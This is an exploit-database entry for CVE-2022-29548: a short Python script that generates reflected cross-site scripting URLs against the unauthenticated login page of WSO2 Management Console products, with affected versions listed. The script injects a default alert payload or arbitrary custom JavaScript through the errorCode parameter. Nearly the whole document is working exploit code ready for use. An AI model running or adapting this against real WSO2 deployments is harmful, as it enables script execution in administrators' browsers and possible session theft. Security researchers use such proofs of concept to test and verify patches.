# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS) # Date: 21 Apr 2022 # Exploit Author: cxosmo # Vendor Homepage: https://wso2.com # Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; # API Microgateway 2.2.0; # Data Analytics Server 3.2.0; # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; # Identity Server Analytics 5.5.0 and 5.6.0; # WSO2 Micro Integrator 1.0.0. # Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82) # CVE: CVE-2022-29548 import argparse import logging import urllib.parse # Global variables VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode=" DEFAULT_PAYLOAD = "alert(document.domain)" # Logging config logging.basicConfig(level=logging.INFO, format="") log = logging.getLogger() def generate_payload(url, custom_payload=False): log.info(f"Generating payload for {url}...") if custom_payload: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//") else: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//") def clean_url_input(url): if url.count("/") > 2: return f"{url.split('/')[0]}//{url.split('/')[2]}" else: return url def check_payload(payload): encoded_characters = ['"', '<', '>'] if any(character in payload for character in encoded_characters): log.info(f"Unsupported character(s) (\", <, >) found in payload.") return False else: return urllib.parse.quote(payload) if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)", required="True", action="store") parser.add_argument("-p", "--payload", help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))", action="store", default=False) args = parser.parse_args() # Clean user target input args.target = clean_url_input(args.target.lower()) # Check for unsupported characters in custom payload; URL-encode as required if args.payload: args.payload = check_payload(args.payload) if args.payload: generate_payload(args.target, args.payload) else: generate_payload(args.target)